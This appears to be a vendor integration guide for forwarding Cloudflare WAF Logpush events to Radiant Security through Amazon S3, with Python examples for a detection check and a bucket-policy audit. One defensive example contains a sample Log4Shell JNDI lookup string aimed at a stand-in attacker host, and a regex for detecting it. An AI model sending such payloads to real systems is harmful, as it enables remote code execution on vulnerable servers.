# Cloudflare WAF

In this guide, you will configure Cloudflare Logpush to forward HTTP and firewall events to Radiant Security via Amazon S3. Cloudflare WAF protects web applications from threats such as SQL injection, cross-site scripting (XSS), and DDoS attacks by inspecting and filtering traffic at the network edge.

### Prerequisites

* [ ] An AWS account with permissions to create and modify S3 buckets, SNS topics, and IAM policies.
* [ ] Super Administrator access (or Log Share permissions) to the Cloudflare dashboard.
* [ ] An S3 bucket where Cloudflare will store logs (follow this AWS guide to create one: [Creating a general purpose bucket](https://docs.aws.amazon.com/AmazonS3/latest/userguide/create-bucket-overview.html)).
* [ ] Administrator role in Radiant Security

{% hint style="danger" %}
**Important note:** Cloudflare Logpush requires a Bucket Policy to allow Cloudflare to write to your bucket. (You generally do not need an Access Key/Secret Key for Cloudflare Logpush if using the recommended Bucket Policy method.)
{% endhint %}

### Configure Cloudflare WAF

Ensure that you have your S3 bucket information at hand. You must configure a Bucket Policy on your S3 bucket to allow Cloudflare to write logs to it. Please refer to Cloudflare's documentation on [Enable Amazon S3](https://developers.cloudflare.com/logs/logpush/logpush-job/enable-destinations/aws-s3/) for the required JSON policy.

### Configure Logpush integration

1. In the Cloudflare dashboard, go to the **Logpush** page at the level you want to monitor: either the account or an individual domain (also known as a zone).
   * For account: [Go to Logpush](https://dash.cloudflare.com/?to=/:account/logs)
   * For domain (also known as zone): [Go to Logpush](https://dash.cloudflare.com/?to=/:account/:zone/analytics/logs)
2. Depending on your choice, you have access to [account-scoped datasets](https://developers.cloudflare.com/logs/logpush/logpush-job/datasets/account/) and [zone-scoped datasets](https://developers.cloudflare.com/logs/logpush/logpush-job/datasets/zone/), respectively.
3. Select **Create a Logpush job**.
4. In **Select a destination**, choose **Amazon S3**.
5. Enter or select the following destination information:
   * **Bucket:** S3 bucket name
   * **Path:** Bucket location within the storage container
   * **Organize logs into daily subfolders** (recommended)
   * **Bucket region**
   * Select [AWS SSE-S3 AES256 Server Side Encryption ↗](https://docs.aws.amazon.com/AmazonS3/latest/userguide/serv-side-encryption.html) if your policy requires it.
   * To **Grant Cloudflare access to upload files to your bucket**, you must apply a bucket policy (if you did not add it already):
     * Copy the JSON policy displayed on [this page](https://docs.aws.amazon.com/AmazonS3/latest/userguide/example-policies-s3.html#iam-policy-ex0), then go to your bucket in the Amazon S3 console and paste the policy in **Permissions** > **Bucket Policy**.
     * Click **Save**.

When you are done entering the destination details, select **Continue**.

6. To prove ownership, Cloudflare will send a file to your designated destination. To find the token, select the **Open** button in the **Overview** tab of the ownership challenge file, then paste it into the Cloudflare dashboard to verify your access to the bucket. Enter the **Ownership Token** and select **Continue**.
7. Select the dataset to push to the storage service: `http_requests` or `firewall_events`. Since each Logpush job pushes only one dataset, set up a second Logpush job if you want both datasets.
8. In the next step, you need to configure your Logpush job:
   * Enter the **Job name**.
   * Under **If logs match**, you can select the events to include and/or remove from your logs. Refer to [Filters](https://developers.cloudflare.com/logs/logpush/logpush-job/filters/) for more information. Not all datasets have this option available.
   * In **Send the following fields**, you can choose to either push all logs to your storage destination or selectively choose which logs you want to push.
9. **Advanced Options** should be kept as default.
   * Warning: The **CVE-2021-44228 redaction option** in Cloudflare's Advanced Options replaces `${` with `x{`. Default is OFF, but if it is ON, Radiant cannot detect Log4Shell-style attacks because the pattern has been mangled at the source.
10. Select **Submit** once you are done configuring your Logpush job.
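The warning in step 9 is easy to underestimate, so the following added example (not part of the Radiant or Cloudflare documentation) shows the effect offline. It applies the same `${` to `x{` substitution the redaction option performs to two constructed `http_requests`-style lines and runs a simple JNDI-lookup detector over the raw and the redacted versions; the field names mirror Cloudflare's dataset but the lines themselves are made up.

```python
import re

# Mirror of the CVE-2021-44228 redaction option: Cloudflare rewrites "${" to "x{"
# before the event leaves the edge. Assumption: a plain substring replacement,
# which is what the documented behaviour describes.
def cloudflare_redact(line: str) -> str:
    return line.replace("${", "x{")

# Detector used by many log pipelines: the literal lookup prefix "${jndi:" in any
# request field, case-insensitive. It anchors on the "${" token, which is exactly
# what the redaction removes.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

def detect_log4shell(line: str) -> bool:
    return JNDI_LOOKUP.search(line) is not None

# Constructed sample lines (not real Cloudflare output). The second line carries a
# lookup string in ClientRequestUserAgent; the first is ordinary traffic.
SAMPLE_LINES = [
    '{"ClientIP":"203.0.113.10","ClientRequestPath":"/","ClientRequestUserAgent":"Mozilla/5.0"}',
    '{"ClientIP":"198.51.100.7","ClientRequestPath":"/login",'
    '"ClientRequestUserAgent":"${jndi:ldap://attacker.example/a}"}',
]

def count_detections(lines, redacted: bool) -> int:
    """Count lines the detector flags, optionally after edge-side redaction."""
    total = 0
    for line in lines:
        if redacted:
            line = cloudflare_redact(line)
        if detect_log4shell(line):
            total += 1
    return total

if __name__ == "__main__":
    print("detections on raw logs:     ", count_detections(SAMPLE_LINES, redacted=False))  # 1
    print("detections on redacted logs:", count_detections(SAMPLE_LINES, redacted=True))   # 0
    print("redacted field looks like:  ", cloudflare_redact("${jndi:ldap://attacker.example/a}"))
```

The redacted line still contains the host and path of the lookup, but the token every signature keys on is gone, so the event arrives at Radiant looking like a malformed user agent rather than an exploitation attempt. Leave the option at its default (OFF) unless a separate compliance requirement forces it on, and if it must be on, expect the firewall_events dataset rather than http_requests to be your only signal.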

### Create and get access to an S3 bucket <a href="#create-and-get-access-to-an-s3-bucket" id="create-and-get-access-to-an-s3-bucket"></a>

Cloudflare uses Amazon Identity and Access Management (IAM) to gain access to your S3 bucket. The Cloudflare IAM user needs the `PutObject` permission for the bucket.

Logs are written into that bucket as gzipped objects using the S3 Access Control List (ACL) `Bucket-owner-full-control` permission.

{% hint style="info" %}
**Note:** For example, if you want to store logs in the bucket `burritobot` in the `logs` directory, the S3 URL would be `s3://burritobot/logs`
{% endhint %}

Ensure **Log Share** permissions are enabled before attempting to read or configure a Logpush job. For more information, refer to the [Roles](https://developers.cloudflare.com/logs/logpush/permissions/#roles) section.

To enable Logpush to Amazon S3:

1. Create an S3 bucket. Refer to Amazon's "Create an S3 bucket" documentation.
2. Edit and paste the policy below into **S3** > **Bucket** > **Permissions** > **Bucket Policy**.

{% hint style="info" %}
**Note:** Replace the `Resource` value with your own bucket path. The `AWS Principal` is owned by Cloudflare and should *not* be changed.
{% endhint %}

```json
{
  "Id": "<POLICY_ID>",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Stmt1506627150918",
      "Action": ["s3:PutObject"],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::<YOUR_BUCKET_NAME>/<YOUR_FOLDER>/*",
      "Principal": {
        "AWS": ["arn:aws:iam::391854517948:user/cloudflare-logpush"]
      }
    }
  ]
}
```

{% hint style="info" %}
**Note:** Logpush uses multipart upload for S3. Aborted uploads will result in incomplete files remaining in your bucket. To minimize your storage costs, Amazon recommends configuring a lifecycle rule using the `AbortIncompleteMultipartUpload` action. Refer to [Uploading and copying objects using multipart upload ↗](https://docs.aws.amazon.com/AmazonS3/latest/dev/mpuoverview.html#mpu-abort-incomplete-mpu-lifecycle-config).
{% endhint %}
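Before pasting the policy above, it is worth checking that the Cloudflare grant is as narrow as the sample: one principal, `s3:PutObject` only, and a resource confined to the log prefix rather than the whole bucket. The added example below (not Radiant's or Cloudflare's code) does that check against a constructed copy of the page's policy with the placeholders filled in for an imaginary bucket `example-waf-logs` and prefix `cloudflare`, and builds the `AbortIncompleteMultipartUpload` lifecycle rule from the note above in the dictionary shape that boto3's `put_bucket_lifecycle_configuration` accepts. The bucket and prefix names, the policy `Id`, the rule ID and the seven-day retention are all assumptions for the example.

```python
import json

# Cloudflare Logpush principal exactly as it appears in the sample bucket policy.
CLOUDFLARE_LOGPUSH_PRINCIPAL = "arn:aws:iam::391854517948:user/cloudflare-logpush"

# Constructed sample: the documented policy with placeholders filled in.
SAMPLE_POLICY = json.dumps({
    "Id": "cloudflare-logpush-write",
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "Stmt1506627150918",
        "Action": ["s3:PutObject"],
        "Effect": "Allow",
        "Resource": "arn:aws:s3:::example-waf-logs/cloudflare/*",
        "Principal": {"AWS": [CLOUDFLARE_LOGPUSH_PRINCIPAL]},
    }],
})

def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]

def check_logpush_policy(policy_json: str, bucket: str, prefix: str) -> list:
    """Return findings for the Allow statements that involve Cloudflare's principal.

    An empty list means: exactly Cloudflare's Logpush user, only s3:PutObject,
    only the intended prefix in the intended bucket, and no anonymous grant.
    """
    findings = []
    expected_resource = f"arn:aws:s3:::{bucket}/{prefix}/*"
    policy = json.loads(policy_json)
    cloudflare_statements = 0
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "<no Sid>")
        principal = stmt.get("Principal", {})
        if principal == "*":
            findings.append(f"{sid}: anonymous principal")
            continue
        principals = _as_list(principal.get("AWS", []))
        if "*" in principals:
            findings.append(f"{sid}: anonymous AWS principal")
            continue
        if CLOUDFLARE_LOGPUSH_PRINCIPAL not in principals:
            continue  # some other grant; outside this check's scope
        cloudflare_statements += 1
        if len(principals) != 1:
            findings.append(f"{sid}: other principals share Cloudflare's statement")
        actions = set(_as_list(stmt.get("Action", [])))
        extra = sorted(actions - {"s3:PutObject"})
        if actions != {"s3:PutObject"}:
            findings.append(f"{sid}: actions beyond s3:PutObject: {extra}")
        for resource in _as_list(stmt.get("Resource", [])):
            if resource != expected_resource:
                findings.append(f"{sid}: resource {resource!r} is not {expected_resource!r}")
    if cloudflare_statements == 0:
        findings.append("no statement grants the Cloudflare Logpush principal")
    return findings

def abort_incomplete_mpu_rule(prefix: str, days: int = 7) -> dict:
    """Lifecycle rule that aborts stale multipart uploads under the log prefix.

    Returns the LifecycleConfiguration value for boto3's
    put_bucket_lifecycle_configuration; the rule ID and default of 7 days are
    choices made for this example.
    """
    return {
        "Rules": [{
            "ID": "abort-incomplete-logpush-uploads",
            "Status": "Enabled",
            "Filter": {"Prefix": f"{prefix}/"},
            "AbortIncompleteMultipartUpload": {"DaysAfterInitiation": days},
        }]
    }

if __name__ == "__main__":
    print("findings:", check_logpush_policy(SAMPLE_POLICY, "example-waf-logs", "cloudflare"))
    print(json.dumps(abort_incomplete_mpu_rule("cloudflare"), indent=2))
```

Run the check on the policy you intend to paste; a finding about the resource usually means the `<YOUR_FOLDER>` placeholder was dropped and Cloudflare would be allowed to write anywhere in the bucket, and a finding about actions means something wider than `s3:PutObject` crept in while editing. The lifecycle rule is scoped to the same prefix so it cannot touch objects elsewhere in the bucket.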

### Configure S3 bucket for Radiant Security

Now that Cloudflare is configured to send logs to your S3 bucket, you need to configure the bucket to allow Radiant Security to collect the logs.

Follow the [Configure Amazon S3 to forward logs to Radiant Security](https://help.radiantsecurity.ai/~/revisions/922Q246ivW25E7jQi4sE/radiant-connectors/data-connectors/configure-amazon-s3-to-forward-logs-to-radiant-security) guide to:

1. Configure a bucket policy to allow Radiant Security read access.
2. Create and configure an SNS topic for event notifications.
3. Set up S3 event notifications for the folder prefix(es) you configured in Cloudflare.
4. Create the Amazon S3 Connector on Radiant Security.

